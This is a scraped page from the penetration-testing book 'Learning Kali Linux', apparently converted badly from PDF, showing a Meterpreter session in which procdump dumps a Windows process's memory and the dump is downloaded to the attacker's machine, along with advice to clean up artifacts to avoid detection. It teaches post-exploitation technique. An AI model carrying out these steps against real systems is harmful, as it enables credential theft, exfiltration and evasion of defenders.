• Using Meterpreter | 191
  • Learning Kali Linux




    Download 22,59 Mb.
    Pdf ko'rish
    bet176/225
    Sana14.05.2024
    Hajmi22,59 Mb.
    #232856
    1   ...   172   173   174   175   176   177   178   179   ...   225
    Bog'liq
    learningkalilinux

    \W
    indows
    \s
    ystem32>procdump64.exe cygrunsrv.exe
    procdump64.exe cygrunsrv.exe
    ProcDump v9.0 - Sysinternals process dump utility
    Copyright 
    (
    C
    )
    2009-2017 Mark Russinovich and Andrew Richards
    Sysinternals - www.sysinternals.com
    [
    13:44:20
    ]
    Dump 
    1
    initiated: C:
    \W
    indows
    \s
    ystem32
    \c
    ygrunsrv.exe_180210_134420.dmp
    [
    13:44:20
    ]
    Dump 
    1
    complete

    5
    MB written in 0.1 seconds
    [
    13:44:20
    ]
    Dump count reached.
    C:
    \W
    indows
    \s
    ystem32>exit
    exit
    meterpreter > download cygrunsrv.exe_180210_134420.dmp
    [
    *
    ]
    Downloading: cygrunsrv.exe_180210_134420.dmp -> cygrunsrv.exe_180210_134420.dmp
    [
    *
    ]
    Downloaded 1.00 MiB of 4.00 MiB 
    (
    25.0%
    )
    : cygrunsrv.exe_180210_134420.dmp ->
    cygrunsrv.exe_180210_134420.dmp
    [
    *
    ]
    Downloaded 2.00 MiB of 4.00 MiB 
    (
    50.0%
    )
    : cygrunsrv.exe_180210_134420.dmp ->
    cygrunsrv.exe_180210_134420.dmp
    [
    *
    ]
    Downloaded 3.00 MiB of 4.00 MiB 
    (
    75.0%
    )
    : cygrunsrv.exe_180210_134420.dmp ->
    Using Meterpreter | 191


    cygrunsrv.exe_180210_134420.dmp
    [
    *
    ]
    Downloaded 4.00 MiB of 4.00 MiB 
    (
    100.0%
    )
    : cygrunsrv.exe_180210_134420.dmp ->
    cygrunsrv.exe_180210_134420.dmp
    [
    *
    ]
    download : cygrunsrv.exe_180210_134420.dmp -> cygrunsrv.exe_180210_134420.dmp
    The process selected had a token handle listed. We can use either the process name or
    the PID to tell 
    procdump64.exe
    which process we want to dump. If you have processes
    with the same name, as was the case with 
    postgres.exe
    because it spawned numerous
    child processes to manage the work, you will have to use the PID. This makes it clear
    to 
    procdump64.exe
    which process you mean to extract from memory. We end up with

    .dmp
    file left on the disk of the remote system. If we want to analyze it, we’ll want to
    bring it back to our local system to work on it. We can do that using 
    download
    in
    Meterpreter. Before we can do that, we need to drop out of the shell on the remote
    system so we just 
    exit
    out. This doesn’t lose the connection to the remote system,
    since we still have our Meterpreter session running. We just spawned a shell out of
    our Meterpreter session and needed to drop back to Meterpreter.
    Once we are on the remote system, there are a number of things we can do with pro‐
    cesses. This could be done using Meterpreter, one of the other modules that could be
    loaded, or any number of programs we could upload to the remote system. One thing
    to keep in mind is that you may want to clean up after yourself after you’re done so
    any artifacts you created aren’t available for detection later.

    Download 22,59 Mb.
    1   ...   172   173   174   175   176   177   178   179   ...   225




    Download 22,59 Mb.
    Pdf ko'rish